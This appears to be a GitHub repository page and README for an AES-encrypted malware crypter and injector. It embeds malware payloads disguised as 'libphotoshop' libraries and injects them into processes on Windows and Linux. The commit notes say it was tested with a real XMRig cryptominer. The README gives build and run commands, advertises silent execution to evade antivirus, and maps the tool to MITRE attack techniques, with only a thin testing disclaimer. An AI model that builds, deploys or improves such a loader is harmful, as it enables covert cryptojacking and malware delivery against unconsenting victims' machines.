JorySeverijnse
59a40a43f6
- Implement AES-128-CBC encryption with SHA256 key derivation - Add Linux SO injector with dlopen + function calling - Add Windows DLL injector with NT API + APC queuing - Create automated build script (build_injectors.sh) - Generate single encrypted_payload.bin files per platform - Embed real malware payloads (libphotoshop.dll/so) - Update documentation and clean up repository - Linux injector tested with real XMRig mining (700%+ CPU usage) - Windows injector ready for compilation and testing Security features: - AES-128-CBC with random IVs and PKCS7 padding - SHA256(password + salt) key derivation - Cross-platform isolation (no code leakage) - Single encrypted file format per platform - Embedded payloads with no external dependencies |
||
|---|---|---|
| crypt | ||
| .gitignore | ||
| build_injectors.sh | ||
| COMPILATION_README.md | ||
| decryptor.cpp | ||
| dll_payload_data.h | ||
| linux_injector | ||
| linux_injector.cpp | ||
| README.md | ||
| so_payload_data.h | ||
| windows_injector.cpp | ||
AES-Encrypted Cross-Platform Payload Injector
Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.
🚀 Quick Start
# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)
# Run the automated build script:
./build_injectors.sh
# This creates:
# - linux_injector (ready to run on Linux)
# - windows_injector.cpp + dll_payload_data.h (for Windows compilation)
📦 What It Does
Encryption
- AES-128-CBC encryption with random IVs
- SHA256 key derivation (password + salt)
- PKCS7 padding with validation
- Single
encrypted_payload.binfile per platform
Injection
- Windows: NT API DLL injection with job freezing + APC queuing
- Linux: SO injection with dlopen + function calling
- Embedded payloads: No external file dependencies
- Silent execution: No visible output or errors
🔧 Manual Usage
Linux Build & Run
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector # Decrypts and injects embedded SO
Windows Build & Run
# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib
# Run the injector:
windows_injector.exe # Decrypts and injects embedded DLL
Custom Encryption
cd crypt
cargo run ../your_malware.dll # Creates encrypted_payload.bin
# Embed the data in injector source code
🔒 Security Features
- AES-128-CBC with cryptographically secure random IVs
- SHA256 key derivation using password + random salt
- PKCS7 padding with validation
- No embedded keys (derived at runtime)
- Cross-platform isolation (Windows code ≠ Linux code)
📋 Architecture
├── crypt/ # Rust AES encryption tool
├── linux_injector # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh # Automated build script
├── dll_payload_data.h # Windows embedded encrypted DLL
├── so_payload_data.h # Linux embedded encrypted SO
└── decryptor.cpp # Standalone decryption utility
✅ Verification
Linux Testing: ✅ AES decryption + SO injection + mining activity confirmed Windows Ready: ✅ Source prepared with real encrypted DLL payload
⚠️ Disclaimer
This is a tool for testing AV/EDR detection capabilities. Use at your own risk.
🔍 MITRE ATT&CK
- T1204.002 - User Execution: Malicious File
- T1140 - Deobfuscate/Decode Files or Information
- T1027.009 - Embedded Payloads
- T1620 - Reflective Code Loading
- T1055 - Process Injection
📚 References
- AES-CBC encryption standard
- OpenSSL crypto library
- Windows CryptoAPI
- Linux dlopen/dlsym